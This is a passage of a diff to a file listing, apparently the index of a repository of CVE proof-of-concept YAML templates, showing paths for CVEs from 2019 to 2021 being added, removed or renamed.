./poc/cve/cve-2019-8442-4242.yaml @@ -23415,7 +23440,6 @@ ./poc/cve/cve-2019-8442-4244.yaml ./poc/cve/cve-2019-8442-4245.yaml ./poc/cve/cve-2019-8442-4246.yaml -./poc/cve/cve-2019-8442.yaml ./poc/cve/cve-2019-8446-4247.yaml ./poc/cve/cve-2019-8446-4248.yaml ./poc/cve/cve-2019-8446-4249.yaml @@ -23459,7 +23483,6 @@ ./poc/cve/cve-2019-9041-4288.yaml ./poc/cve/cve-2019-9041-4289.yaml ./poc/cve/cve-2019-9041-4290.yaml -./poc/cve/cve-2019-9041-4291.yaml ./poc/cve/cve-2019-9082-4292.yaml ./poc/cve/cve-2019-9082-4293.yaml ./poc/cve/cve-2019-9082-4294.yaml @@ -23476,7 +23499,6 @@ ./poc/cve/cve-2019-9670-4304.yaml ./poc/cve/cve-2019-9670-4305.yaml ./poc/cve/cve-2019-9670-4306.yaml -./poc/cve/cve-2019-9670-4307.yaml ./poc/cve/cve-2019-9670.yaml ./poc/cve/cve-2019-9726-4308.yaml ./poc/cve/cve-2019-9726-4309.yaml @@ -23488,7 +23510,7 @@ ./poc/cve/cve-2019-9733-4316.yaml ./poc/cve/cve-2019-9733.yaml ./poc/cve/cve-2019-9915-4317.yaml -./poc/cve/cve-2019-9922(1).yaml +./poc/cve/cve-2019-9915.yaml ./poc/cve/cve-2019-9922-4318.yaml ./poc/cve/cve-2019-9922-4319.yaml ./poc/cve/cve-2019-9955-4320.yaml @@ -23510,7 +23532,7 @@ ./poc/cve/cve-2020-0618-4337.yaml ./poc/cve/cve-2020-0618-4338.yaml ./poc/cve/cve-2020-0618.yaml -./poc/cve/cve-2020-10124.yaml +./poc/cve/cve-2020-10124(1).yaml ./poc/cve/cve-2020-10148-4340.yaml ./poc/cve/cve-2020-10148-4341.yaml ./poc/cve/cve-2020-10148-4342.yaml @@ -23547,6 +23569,7 @@ ./poc/cve/cve-2020-10549-4376.yaml ./poc/cve/cve-2020-10549-4377.yaml ./poc/cve/cve-2020-10549-4378.yaml +./poc/cve/cve-2020-10770-4380.yaml ./poc/cve/cve-2020-10770-4381.yaml ./poc/cve/cve-2020-10770-4382.yaml ./poc/cve/cve-2020-10770-4383.yaml @@ -23594,7 +23617,6 @@ ./poc/cve/cve-2020-11710-4421.yaml ./poc/cve/cve-2020-11710-4422.yaml ./poc/cve/cve-2020-11710-4423.yaml -./poc/cve/cve-2020-11738(1).yaml ./poc/cve/cve-2020-11738-1.yaml ./poc/cve/cve-2020-11738-2.yaml ./poc/cve/cve-2020-11738-4425.yaml @@ -23602,6 +23624,7 @@ ./poc/cve/cve-2020-11738-4427.yaml ./poc/cve/cve-2020-11738-4428.yaml ./poc/cve/cve-2020-11738-4429.yaml +./poc/cve/cve-2020-11738.yaml ./poc/cve/cve-2020-11853-4431.yaml ./poc/cve/cve-2020-11853-4432.yaml ./poc/cve/cve-2020-11853-4433.yaml @@ -23655,11 +23678,11 @@ ./poc/cve/cve-2020-13117-4489.yaml ./poc/cve/cve-2020-13117-4490.yaml ./poc/cve/cve-2020-13117-4491.yaml +./poc/cve/cve-2020-13121.yaml ./poc/cve/cve-2020-13158-4492.yaml ./poc/cve/cve-2020-13158-4493.yaml ./poc/cve/cve-2020-13158-4494.yaml ./poc/cve/cve-2020-13158-4495.yaml -./poc/cve/cve-2020-13158.yaml ./poc/cve/cve-2020-13167-1.yaml ./poc/cve/cve-2020-13167-2.yaml ./poc/cve/cve-2020-13167-4496.yaml @@ -23671,7 +23694,6 @@ ./poc/cve/cve-2020-13379-4502.yaml ./poc/cve/cve-2020-13379-4503.yaml ./poc/cve/cve-2020-13379.yaml -./poc/cve/cve-2020-13405.yaml ./poc/cve/cve-2020-13483-4504.yaml ./poc/cve/cve-2020-13483-4505.yaml ./poc/cve/cve-2020-13483-4506.yaml @@ -23719,7 +23741,7 @@ ./poc/cve/cve-2020-14181-4549.yaml ./poc/cve/cve-2020-14181-4550.yaml ./poc/cve/cve-2020-14181-4551.yaml -./poc/cve/cve-2020-14408.yaml +./poc/cve/cve-2020-14408(1).yaml ./poc/cve/cve-2020-14413-4552.yaml ./poc/cve/cve-2020-14413-4553.yaml ./poc/cve/cve-2020-14413-4554.yaml @@ -23741,6 +23763,7 @@ ./poc/cve/cve-2020-14882-1.yaml ./poc/cve/cve-2020-14882-2-4571.yaml ./poc/cve/cve-2020-14882-2-4572.yaml +./poc/cve/cve-2020-14882-2.yaml ./poc/cve/cve-2020-14882-4573.yaml ./poc/cve/cve-2020-14882-4574.yaml ./poc/cve/cve-2020-14882-4575.yaml @@ -23756,7 +23779,6 @@ ./poc/cve/cve-2020-14883-4583.yaml ./poc/cve/cve-2020-14883-4584.yaml ./poc/cve/cve-2020-14883-4585.yaml -./poc/cve/cve-2020-14883-4586.yaml ./poc/cve/cve-2020-15004-4587.yaml ./poc/cve/cve-2020-15004-4588.yaml ./poc/cve/cve-2020-15004-4589.yaml @@ -23793,6 +23815,7 @@ ./poc/cve/cve-2020-15568-4620.yaml ./poc/cve/cve-2020-15568-4621.yaml ./poc/cve/cve-2020-15568-4622.yaml +./poc/cve/cve-2020-15568-4623.yaml ./poc/cve/cve-2020-15920-4624.yaml ./poc/cve/cve-2020-15920-4625.yaml ./poc/cve/cve-2020-15920-4626.yaml @@ -23839,7 +23862,7 @@ ./poc/cve/cve-2020-17496-4670.yaml ./poc/cve/cve-2020-17496-4671.yaml ./poc/cve/cve-2020-17496-4672.yaml -./poc/cve/cve-2020-17505-4674.yaml +./poc/cve/cve-2020-17496-4673.yaml ./poc/cve/cve-2020-17505-4675.yaml ./poc/cve/cve-2020-17505-4676.yaml ./poc/cve/cve-2020-17505-4677.yaml @@ -23868,20 +23891,21 @@ ./poc/cve/cve-2020-18268-4703.yaml ./poc/cve/cve-2020-19282-4705.yaml ./poc/cve/cve-2020-19282-4706.yaml +./poc/cve/cve-2020-19283-4707.yaml ./poc/cve/cve-2020-19283-4708.yaml ./poc/cve/cve-2020-19283-4709.yaml ./poc/cve/cve-2020-19295-4710.yaml ./poc/cve/cve-2020-19295-4711.yaml ./poc/cve/cve-2020-19295-4712.yaml +./poc/cve/cve-2020-19360-4713.yaml ./poc/cve/cve-2020-19360-4714.yaml -./poc/cve/cve-2020-1938-4715.yaml ./poc/cve/cve-2020-1938-4716.yaml ./poc/cve/cve-2020-1938-4717.yaml -./poc/cve/cve-2020-1943-4718.yaml ./poc/cve/cve-2020-1943-4719.yaml ./poc/cve/cve-2020-1943-4720.yaml ./poc/cve/cve-2020-1943-4721.yaml ./poc/cve/cve-2020-1943-4722.yaml +./poc/cve/cve-2020-1956.yaml ./poc/cve/cve-2020-19625-4723.yaml ./poc/cve/cve-2020-19625-4724.yaml ./poc/cve/cve-2020-19625-4725.yaml @@ -23906,7 +23930,6 @@ ./poc/cve/cve-2020-20982-4741.yaml ./poc/cve/cve-2020-20982-4742.yaml ./poc/cve/cve-2020-20982-4743.yaml -./poc/cve/cve-2020-20988(1).yaml ./poc/cve/cve-2020-2103-4744.yaml ./poc/cve/cve-2020-2103-4745.yaml ./poc/cve/cve-2020-2103-4746.yaml @@ -23924,9 +23947,9 @@ ./poc/cve/cve-2020-2199-4757.yaml ./poc/cve/cve-2020-2199-4758.yaml ./poc/cve/cve-2020-2199-4759.yaml -./poc/cve/cve-2020-22209.yaml +./poc/cve/cve-2020-22209(1).yaml +./poc/cve/cve-2020-22210(1).yaml ./poc/cve/cve-2020-22210-4760.yaml -./poc/cve/cve-2020-22210.yaml ./poc/cve/cve-2020-22840-4761.yaml ./poc/cve/cve-2020-22840-4763.yaml ./poc/cve/cve-2020-22840-4764.yaml @@ -23977,6 +24000,7 @@ ./poc/cve/cve-2020-24312-4809.yaml ./poc/cve/cve-2020-24391-4811.yaml ./poc/cve/cve-2020-24391-4812.yaml +./poc/cve/cve-2020-24391-4813.yaml ./poc/cve/cve-2020-24550-4814.yaml ./poc/cve/cve-2020-24550-4815.yaml ./poc/cve/cve-2020-24550-4816.yaml @@ -24015,7 +24039,6 @@ ./poc/cve/cve-2020-25078-4855.yaml ./poc/cve/cve-2020-25078-4856.yaml ./poc/cve/cve-2020-25078-4857.yaml -./poc/cve/cve-2020-25078-4858.yaml ./poc/cve/cve-2020-25213-4859.yaml ./poc/cve/cve-2020-25213-4860.yaml ./poc/cve/cve-2020-25213-4861.yaml @@ -24028,12 +24051,10 @@ ./poc/cve/cve-2020-25223-4868.yaml ./poc/cve/cve-2020-25223-4869.yaml ./poc/cve/cve-2020-25223-4870.yaml -./poc/cve/cve-2020-25223-4871.yaml ./poc/cve/cve-2020-25495-4872.yaml ./poc/cve/cve-2020-25495-4873.yaml ./poc/cve/cve-2020-25495-4874.yaml ./poc/cve/cve-2020-25495-4875.yaml -./poc/cve/cve-2020-25495-4876.yaml ./poc/cve/cve-2020-25506-1.yaml ./poc/cve/cve-2020-25506-2.yaml ./poc/cve/cve-2020-25506-3.yaml @@ -24085,7 +24106,6 @@ ./poc/cve/cve-2020-26919-4928.yaml ./poc/cve/cve-2020-26919-4929.yaml ./poc/cve/cve-2020-26919-4930.yaml -./poc/cve/cve-2020-26919-4931.yaml ./poc/cve/cve-2020-26919-4932.yaml ./poc/cve/cve-2020-26948-4933.yaml ./poc/cve/cve-2020-26948-4934.yaml @@ -24132,9 +24152,9 @@ ./poc/cve/cve-2020-28351-4981.yaml ./poc/cve/cve-2020-28351-4982.yaml ./poc/cve/cve-2020-28351-4983.yaml +./poc/cve/cve-2020-28351-4984.yaml ./poc/cve/cve-2020-28871-4985.yaml ./poc/cve/cve-2020-28871-4986.yaml -./poc/cve/cve-2020-28871-4987.yaml ./poc/cve/cve-2020-28871-4988.yaml ./poc/cve/cve-2020-28976-4989.yaml ./poc/cve/cve-2020-28976-4990.yaml @@ -24157,7 +24177,7 @@ ./poc/cve/cve-2020-29453-5008.yaml ./poc/cve/cve-2020-29453-5009.yaml ./poc/cve/cve-2020-29453-5010.yaml -./poc/cve/cve-2020-29597.yaml +./poc/cve/cve-2020-29597(1).yaml ./poc/cve/cve-2020-3187-5011.yaml ./poc/cve/cve-2020-3187-5012.yaml ./poc/cve/cve-2020-3187-5013.yaml @@ -24198,11 +24218,13 @@ ./poc/cve/cve-2020-35580-5048.yaml ./poc/cve/cve-2020-35580-5049.yaml ./poc/cve/cve-2020-35580-5050.yaml +./poc/cve/cve-2020-35580-5051.yaml ./poc/cve/cve-2020-35598-5052.yaml ./poc/cve/cve-2020-35598-5053.yaml ./poc/cve/cve-2020-35598-5054.yaml ./poc/cve/cve-2020-35598-5055.yaml ./poc/cve/cve-2020-35598-5056.yaml +./poc/cve/cve-2020-35713-5058.yaml ./poc/cve/cve-2020-35713-5059.yaml ./poc/cve/cve-2020-35713-5060.yaml ./poc/cve/cve-2020-35729-5061.yaml @@ -24223,6 +24245,7 @@ ./poc/cve/cve-2020-35774-5078.yaml ./poc/cve/cve-2020-35774-5079.yaml ./poc/cve/cve-2020-35774-5080.yaml +./poc/cve/cve-2020-35774-5081.yaml ./poc/cve/cve-2020-35774-5082.yaml ./poc/cve/cve-2020-3580-5083.yaml ./poc/cve/cve-2020-3580-5084.yaml @@ -24243,7 +24266,6 @@ ./poc/cve/cve-2020-35848-5101.yaml ./poc/cve/cve-2020-35848-5102.yaml ./poc/cve/cve-2020-35848-5103.yaml -./poc/cve/cve-2020-35848-5104.yaml ./poc/cve/cve-2020-35848-5105.yaml ./poc/cve/cve-2020-35951-5106.yaml ./poc/cve/cve-2020-35951-5107.yaml @@ -24257,8 +24279,8 @@ ./poc/cve/cve-2020-36112-5115.yaml ./poc/cve/cve-2020-36112-5116.yaml ./poc/cve/cve-2020-36112-5117.yaml -./poc/cve/cve-2020-36287(1).yaml ./poc/cve/cve-2020-36287-5119.yaml +./poc/cve/cve-2020-36287.yaml ./poc/cve/cve-2020-36289-1.yaml ./poc/cve/cve-2020-36289-2.yaml ./poc/cve/cve-2020-36289-5120.yaml @@ -24356,7 +24378,6 @@ ./poc/cve/cve-2020-6207-5207.yaml ./poc/cve/cve-2020-6207-5208.yaml ./poc/cve/cve-2020-6207-5209.yaml -./poc/cve/cve-2020-6207-5210.yaml ./poc/cve/cve-2020-6287-5211.yaml ./poc/cve/cve-2020-6287-5212.yaml ./poc/cve/cve-2020-6287-5213.yaml @@ -24396,6 +24417,7 @@ ./poc/cve/cve-2020-7247-5245.yaml ./poc/cve/cve-2020-7247-5246.yaml ./poc/cve/cve-2020-7247-5247.yaml +./poc/cve/cve-2020-7318-5248.yaml ./poc/cve/cve-2020-7318-5249.yaml ./poc/cve/cve-2020-7318-5250.yaml ./poc/cve/cve-2020-7318-5251.yaml @@ -24418,7 +24440,6 @@ ./poc/cve/cve-2020-7961-5266.yaml ./poc/cve/cve-2020-7961-5267.yaml ./poc/cve/cve-2020-7961-5268.yaml -./poc/cve/cve-2020-7980.yaml ./poc/cve/cve-2020-8091-5269.yaml ./poc/cve/cve-2020-8091-5270.yaml ./poc/cve/cve-2020-8091-5271.yaml @@ -24444,6 +24465,7 @@ ./poc/cve/cve-2020-8191-5291.yaml ./poc/cve/cve-2020-8191-5292.yaml ./poc/cve/cve-2020-8191-5293.yaml +./poc/cve/cve-2020-8191-5294.yaml ./poc/cve/cve-2020-8193-5295.yaml ./poc/cve/cve-2020-8193-5296.yaml ./poc/cve/cve-2020-8193-5297.yaml @@ -24465,6 +24487,7 @@ ./poc/cve/cve-2020-8209-5313.yaml ./poc/cve/cve-2020-8209-5314.yaml ./poc/cve/cve-2020-8451.yaml +./poc/cve/cve-2020-8497-5316.yaml ./poc/cve/cve-2020-8497-5317.yaml ./poc/cve/cve-2020-8512-5318.yaml ./poc/cve/cve-2020-8512-5319.yaml @@ -24483,6 +24506,8 @@ ./poc/cve/cve-2020-8641-5333.yaml ./poc/cve/cve-2020-8641-5334.yaml ./poc/cve/cve-2020-8644-5335.yaml +./poc/cve/cve-2020-8644.yaml +./poc/cve/cve-2020-8654(1).yaml ./poc/cve/cve-2020-8771-5336.yaml ./poc/cve/cve-2020-8771-5337.yaml ./poc/cve/cve-2020-8771-5338.yaml @@ -24504,7 +24529,6 @@ ./poc/cve/cve-2020-9036-5356.yaml ./poc/cve/cve-2020-9036-5357.yaml ./poc/cve/cve-2020-9036-5358.yaml -./poc/cve/cve-2020-9036-5359.yaml ./poc/cve/cve-2020-9047-5360.yaml ./poc/cve/cve-2020-9047-5361.yaml ./poc/cve/cve-2020-9047-5362.yaml @@ -24565,7 +24589,7 @@ ./poc/cve/cve-2020-9490-5414.yaml ./poc/cve/cve-2020-9490-5415.yaml ./poc/cve/cve-2020-9490-5416.yaml -./poc/cve/cve-2020-9496-5418.yaml +./poc/cve/cve-2020-9490-5417.yaml ./poc/cve/cve-2020-9496-5419.yaml ./poc/cve/cve-2020-9496-5420.yaml ./poc/cve/cve-2020-9496-5421.yaml @@ -24575,6 +24599,7 @@ ./poc/cve/cve-2020-9757-5424.yaml ./poc/cve/cve-2020-9757-5425.yaml ./poc/cve/cve-2020-9757-5426.yaml +./poc/cve/cve-20200924a(1).yaml ./poc/cve/cve-2020–26073-4901.yaml ./poc/cve/cve-2020–26073-4903.yaml ./poc/cve/cve-2020–26073-4905.yaml @@ -24589,6 +24614,7 @@ ./poc/cve/cve-2021-1498-5435.yaml ./poc/cve/cve-2021-1498-5436.yaml ./poc/cve/cve-2021-1498-5437.yaml +./poc/cve/cve-2021-1499-5438.yaml ./poc/cve/cve-2021-1499-5439.yaml ./poc/cve/cve-2021-1499-5440.yaml ./poc/cve/cve-2021-20031-5441.yaml @@ -24601,6 +24627,7 @@ ./poc/cve/cve-2021-20090-5448.yaml ./poc/cve/cve-2021-20090-5449.yaml ./poc/cve/cve-2021-20090-5450.yaml +./poc/cve/cve-2021-20090-5451.yaml ./poc/cve/cve-2021-20091-5452.yaml ./poc/cve/cve-2021-20091-5453.yaml ./poc/cve/cve-2021-20091-5454.yaml @@ -24610,13 +24637,13 @@ ./poc/cve/cve-2021-20114-5459.yaml ./poc/cve/cve-2021-20114-5460.yaml ./poc/cve/cve-2021-20114-5461.yaml +./poc/cve/cve-2021-20114-5462.yaml ./poc/cve/cve-2021-20123-5463.yaml ./poc/cve/cve-2021-20123-5464.yaml ./poc/cve/cve-2021-20123-5465.yaml ./poc/cve/cve-2021-20124-5466.yaml ./poc/cve/cve-2021-20124-5467.yaml ./poc/cve/cve-2021-20124-5468.yaml -./poc/cve/cve-2021-20137(1).yaml ./poc/cve/cve-2021-20150-5469.yaml ./poc/cve/cve-2021-20150-5470.yaml ./poc/cve/cve-2021-20150-5471.yaml @@ -24628,6 +24655,7 @@ ./poc/cve/cve-2021-20167-5477.yaml ./poc/cve/cve-2021-20792-5478.yaml ./poc/cve/cve-2021-20792-5479.yaml +./poc/cve/cve-2021-20837-5480.yaml ./poc/cve/cve-2021-20837-5481.yaml ./poc/cve/cve-2021-20837-5482.yaml ./poc/cve/cve-2021-20837-5483.yaml @@ -24654,6 +24682,7 @@ ./poc/cve/cve-2021-21315-5504.yaml ./poc/cve/cve-2021-21315-5505.yaml ./poc/cve/cve-2021-21315-5506.yaml +./poc/cve/cve-2021-21315-5507.yaml ./poc/cve/cve-2021-21315-5508.yaml ./poc/cve/cve-2021-21389-5509.yaml ./poc/cve/cve-2021-21389-5510.yaml @@ -24675,9 +24704,8 @@ ./poc/cve/cve-2021-21479-5525.yaml ./poc/cve/cve-2021-21479-5526.yaml ./poc/cve/cve-2021-21745-5527.yaml -./poc/cve/cve-2021-21745.yaml -./poc/cve/cve-2021-21799.yaml -./poc/cve/cve-2021-21800(1).yaml +./poc/cve/cve-2021-21799(1).yaml +./poc/cve/cve-2021-21800.yaml ./poc/cve/cve-2021-21801-5528.yaml ./poc/cve/cve-2021-21801-5529.yaml ./poc/cve/cve-2021-21801-5530.yaml @@ -24690,6 +24718,8 @@ ./poc/cve/cve-2021-21803-5537.yaml ./poc/cve/cve-2021-21803-5538.yaml ./poc/cve/cve-2021-21803-5539.yaml +./poc/cve/cve-2021-21805.yaml +./poc/cve/cve-2021-21816-5540.yaml ./poc/cve/cve-2021-21816-5541.yaml ./poc/cve/cve-2021-21816-5542.yaml ./poc/cve/cve-2021-21881-5543.yaml @@ -24729,7 +24759,6 @@ ./poc/cve/cve-2021-22053-5580.yaml ./poc/cve/cve-2021-22053-5581.yaml ./poc/cve/cve-2021-22054-5582.yaml -./poc/cve/cve-2021-22054.yaml ./poc/cve/cve-2021-22122-1.yaml ./poc/cve/cve-2021-22122-2.yaml ./poc/cve/cve-2021-22122-5583.yaml @@ -24744,6 +24773,7 @@ ./poc/cve/cve-2021-22205-5593.yaml ./poc/cve/cve-2021-22205-5594.yaml ./poc/cve/cve-2021-22205-5595.yaml +./poc/cve/cve-2021-22205-5596.yaml ./poc/cve/cve-2021-22205-5597.yaml ./poc/cve/cve-2021-22214-5598.yaml ./poc/cve/cve-2021-22214-5599.yaml @@ -24751,7 +24781,7 @@ ./poc/cve/cve-2021-22214-5601.yaml ./poc/cve/cve-2021-22214-5602.yaml ./poc/cve/cve-2021-22214-5603.yaml -./poc/cve/cve-2021-22502(1).yaml +./poc/cve/cve-2021-22502.yaml ./poc/cve/cve-2021-22873-1.yaml ./poc/cve/cve-2021-22873-2.yaml ./poc/cve/cve-2021-22873-3.yaml @@ -24775,7 +24805,6 @@ ./poc/cve/cve-2021-23241-5620.yaml ./poc/cve/cve-2021-23241-5621.yaml ./poc/cve/cve-2021-23241-5622.yaml -./poc/cve/cve-2021-23241-5623.yaml ./poc/cve/cve-2021-23241-5624.yaml ./poc/cve/cve-2021-24146-5625.yaml ./poc/cve/cve-2021-24146-5626.yaml @@ -24899,7 +24928,7 @@ ./poc/cve/cve-2021-24472-5743.yaml ./poc/cve/cve-2021-24472-5744.yaml ./poc/cve/cve-2021-24472-5745.yaml -./poc/cve/cve-2021-24488.yaml +./poc/cve/cve-2021-24488(1).yaml ./poc/cve/cve-2021-24495-1.yaml ./poc/cve/cve-2021-24495-2.yaml ./poc/cve/cve-2021-24495-5747.yaml @@ -25034,7 +25063,7 @@ ./poc/cve/cve-2021-26475-5863.yaml ./poc/cve/cve-2021-26598-5864.yaml ./poc/cve/cve-2021-26598-5865.yaml -./poc/cve/cve-2021-26702.yaml +./poc/cve/cve-2021-26702(1).yaml ./poc/cve/cve-2021-26710-5866.yaml ./poc/cve/cve-2021-26710-5867.yaml ./poc/cve/cve-2021-26710-5868.yaml @@ -25082,6 +25111,7 @@ ./poc/cve/cve-2021-27358-5908.yaml ./poc/cve/cve-2021-27358-5909.yaml ./poc/cve/cve-2021-27358-5910.yaml +./poc/cve/cve-2021-27519-test.yaml ./poc/cve/cve-2021-27561-5911.yaml ./poc/cve/cve-2021-27561-5912.yaml ./poc/cve/cve-2021-27561-5913.yaml @@ -25093,8 +25123,8 @@ ./poc/cve/cve-2021-27651-5919.yaml ./poc/cve/cve-2021-27651-5920.yaml ./poc/cve/cve-2021-27651-5921.yaml -./poc/cve/cve-2021-27748(1).yaml ./poc/cve/cve-2021-27748-5922.yaml +./poc/cve/cve-2021-27748.yaml ./poc/cve/cve-2021-27850-5923.yaml ./poc/cve/cve-2021-27850-5924.yaml ./poc/cve/cve-2021-27850-5925.yaml @@ -25174,7 +25204,6 @@ ./poc/cve/cve-2021-29156-3.yaml ./poc/cve/cve-2021-29156-5984.yaml ./poc/cve/cve-2021-29156-5985.yaml -./poc/cve/cve-2021-29156-5986.yaml ./poc/cve/cve-2021-29203-5987.yaml ./poc/cve/cve-2021-29203-5988.yaml ./poc/cve/cve-2021-29203-5989.yaml @@ -25214,7 +25243,6 @@ ./poc/cve/cve-2021-29625-6023.yaml ./poc/cve/cve-2021-3002-6024.yaml ./poc/cve/cve-2021-3002-6025.yaml -./poc/cve/cve-2021-30049-6026.yaml ./poc/cve/cve-2021-30049-6027.yaml ./poc/cve/cve-2021-30049-6028.yaml ./poc/cve/cve-2021-30151-6029.yaml @@ -25301,26 +25329,25 @@ ./poc/cve/cve-2021-31800-6111.yaml ./poc/cve/cve-2021-31800-6112.yaml ./poc/cve/cve-2021-31800-6113.yaml -./poc/cve/cve-2021-31805(1).yaml ./poc/cve/cve-2021-31856-6114.yaml ./poc/cve/cve-2021-31856-6115.yaml ./poc/cve/cve-2021-31856-6116.yaml ./poc/cve/cve-2021-31856-6117.yaml ./poc/cve/cve-2021-31856-6118.yaml +./poc/cve/cve-2021-31862-6119.yaml ./poc/cve/cve-2021-31862-6120.yaml ./poc/cve/cve-2021-32030-6121.yaml ./poc/cve/cve-2021-32030-6122.yaml ./poc/cve/cve-2021-32030-6123.yaml ./poc/cve/cve-2021-32030-6124.yaml -./poc/cve/cve-2021-32172-6125.yaml ./poc/cve/cve-2021-32172-6126.yaml -./poc/cve/cve-2021-3223(1).yaml ./poc/cve/cve-2021-3223-6127.yaml ./poc/cve/cve-2021-3223-6128.yaml ./poc/cve/cve-2021-3223-6129.yaml ./poc/cve/cve-2021-3223-6130.yaml ./poc/cve/cve-2021-3223-6131.yaml ./poc/cve/cve-2021-3223-6132.yaml +./poc/cve/cve-2021-3223.yaml ./poc/cve/cve-2021-32305-6133.yaml ./poc/cve/cve-2021-32305-6134.yaml ./poc/cve/cve-2021-32305-6135.yaml @@ -25351,6 +25378,7 @@ ./poc/cve/cve-2021-3297-6161.yaml ./poc/cve/cve-2021-3297-6162.yaml ./poc/cve/cve-2021-3297-6163.yaml +./poc/cve/cve-2021-33044-6164.yaml ./poc/cve/cve-2021-33044-6165.yaml ./poc/cve/cve-2021-33044-6166.yaml ./poc/cve/cve-2021-33044-6167.yaml @@ -25452,15 +25480,19 @@ ./poc/cve/cve-2021-3577-6259.yaml ./poc/cve/cve-2021-3577-6260.yaml ./poc/cve/cve-2021-3577-6261.yaml +./poc/cve/cve-2021-36260-6262.yaml ./poc/cve/cve-2021-36260-6263.yaml ./poc/cve/cve-2021-36260-6264.yaml +./poc/cve/cve-2021-36356(1).yaml ./poc/cve/cve-2021-36380-6265.yaml ./poc/cve/cve-2021-36380-6266.yaml ./poc/cve/cve-2021-36380-6267.yaml +./poc/cve/cve-2021-36450.yaml ./poc/cve/cve-2021-3654-6268.yaml ./poc/cve/cve-2021-3654-6269.yaml ./poc/cve/cve-2021-3654-6270.yaml ./poc/cve/cve-2021-3654-6271.yaml +./poc/cve/cve-2021-36748-6273.yaml ./poc/cve/cve-2021-36748-6274.yaml ./poc/cve/cve-2021-36748-6275.yaml ./poc/cve/cve-2021-36749-6276.yaml @@ -25479,7 +25511,6 @@ ./poc/cve/cve-2021-37573-6288.yaml ./poc/cve/cve-2021-37573-6289.yaml ./poc/cve/cve-2021-37573-6290.yaml -./poc/cve/cve-2021-37580-6291.yaml ./poc/cve/cve-2021-37580-6292.yaml ./poc/cve/cve-2021-37589(1).yaml ./poc/cve/cve-2021-37704-2.yaml @@ -25491,11 +25522,13 @@ ./poc/cve/cve-2021-37833-4.yaml ./poc/cve/cve-2021-37833-6296.yaml ./poc/cve/cve-2021-37833-6297.yaml +./poc/cve/cve-2021-37859.yaml ./poc/cve/cve-2021-38314-1.yaml ./poc/cve/cve-2021-38314-2.yaml ./poc/cve/cve-2021-38314-6298.yaml ./poc/cve/cve-2021-38314-6299.yaml ./poc/cve/cve-2021-38314-6300.yaml +./poc/cve/cve-2021-38540-6301.yaml ./poc/cve/cve-2021-38540-6302.yaml ./poc/cve/cve-2021-38540-6303.yaml ./poc/cve/cve-2021-38647-6304.yaml @@ -25517,7 +25550,6 @@ ./poc/cve/cve-2021-38751-6320.yaml ./poc/cve/cve-2021-38751-6321.yaml ./poc/cve/cve-2021-38751-6322.yaml -./poc/cve/cve-2021-39211(1).yaml ./poc/cve/cve-2021-39226-6323.yaml ./poc/cve/cve-2021-39226-6324.yaml ./poc/cve/cve-2021-39226-6325.yaml @@ -25548,11 +25580,9 @@ ./poc/cve/cve-2021-39501-6351.yaml ./poc/cve/cve-2021-39501-6352.yaml ./poc/cve/cve-2021-39501-6353.yaml -./poc/cve/cve-2021-40149(1).yaml ./poc/cve/cve-2021-40149-6354.yaml ./poc/cve/cve-2021-40149-6355.yaml ./poc/cve/cve-2021-40150-6356.yaml -./poc/cve/cve-2021-40150.yaml ./poc/cve/cve-2021-40323-6357.yaml ./poc/cve/cve-2021-40323-6358.yaml ./poc/cve/cve-2021-40323-6359.yaml @@ -25626,7 +25656,6 @@ ./poc/cve/cve-2021-41293-6431.yaml ./poc/cve/cve-2021-41349-6432.yaml ./poc/cve/cve-2021-41349-6433.yaml -./poc/cve/cve-2021-41349-6434.yaml ./poc/cve/cve-2021-41381-6435.yaml ./poc/cve/cve-2021-41381-6436.yaml ./poc/cve/cve-2021-41381-6437.yaml @@ -25668,12 +25697,10 @@ ./poc/cve/cve-2021-41878-6475.yaml ./poc/cve/cve-2021-41878-6476.yaml ./poc/cve/cve-2021-41878-6477.yaml -./poc/cve/cve-2021-41878-6478.yaml ./poc/cve/cve-2021-4191-6479.yaml ./poc/cve/cve-2021-4191-6480.yaml ./poc/cve/cve-2021-41951-6481.yaml ./poc/cve/cve-2021-41951-6482.yaml -./poc/cve/cve-2021-41951-6483.yaml ./poc/cve/cve-2021-42013-1.yaml ./poc/cve/cve-2021-42013-2.yaml ./poc/cve/cve-2021-42013-6484.yaml @@ -25686,7 +25713,7 @@ ./poc/cve/cve-2021-42071-6492.yaml ./poc/cve/cve-2021-42071-6493.yaml ./poc/cve/cve-2021-42071-6494.yaml -./poc/cve/cve-2021-42192(1).yaml +./poc/cve/cve-2021-42192.yaml ./poc/cve/cve-2021-42237-6495.yaml ./poc/cve/cve-2021-42237-6496.yaml ./poc/cve/cve-2021-42237-6497.yaml @@ -25701,7 +25728,6 @@ ./poc/cve/cve-2021-42258-6507.yaml ./poc/cve/cve-2021-42551-6508.yaml ./poc/cve/cve-2021-42551-6509.yaml -./poc/cve/cve-2021-42551-6510.yaml ./poc/cve/cve-2021-42565-1.yaml ./poc/cve/cve-2021-42565-2.yaml ./poc/cve/cve-2021-42565-6511.yaml @@ -25728,16 +25754,15 @@ ./poc/cve/cve-2021-43496-6532.yaml ./poc/cve/cve-2021-43778-6533.yaml ./poc/cve/cve-2021-43778-6534.yaml +./poc/cve/cve-2021-43798-6536.yaml ./poc/cve/cve-2021-43798-6537.yaml ./poc/cve/cve-2021-43798-6538.yaml ./poc/cve/cve-2021-43798-6539.yaml -./poc/cve/cve-2021-43798-grafana.yaml ./poc/cve/cve-2021-43810-6540.yaml ./poc/cve/cve-2021-43810-6541.yaml ./poc/cve/cve-2021-43810-6542.yaml -./poc/cve/cve-2021-44077(1).yaml ./poc/cve/cve-2021-44077-6543.yaml -./poc/cve/cve-2021-44103(1).yaml +./poc/cve/cve-2021-44077.yaml ./poc/cve/cve-2021-44103-6544.yaml ./poc/cve/cve-2021-44228-6545.yaml ./poc/cve/cve-2021-44228-6546.yaml @@ -25749,6 +25774,7 @@ ./poc/cve/cve-2021-44427-6552.yaml ./poc/cve/cve-2021-44451.yaml ./poc/cve/cve-2021-44515-6554.yaml +./poc/cve/cve-2021-44515.yaml ./poc/cve/cve-2021-44521-6555.yaml ./poc/cve/cve-2021-44521-6556.yaml ./poc/cve/cve-2021-44528(1).yaml @@ -25777,7 +25803,8 @@ ./poc/cve/cve-2021-45232-6581.yaml ./poc/cve/cve-2021-45380-6582.yaml ./poc/cve/cve-2021-45380-6583.yaml -./poc/cve/cve-2021-45428(1).yaml +./poc/cve/cve-2021-45380-6584.yaml +./poc/cve/cve-2021-45428.yaml ./poc/cve/cve-2021-45967-6585.yaml ./poc/cve/cve-2021-45967-6586.yaml ./poc/cve/cve-2021-45968-6587.yaml @@ -25794,8 +25821,9 @@ ./poc/cve/cve-2021-46381-6599.yaml 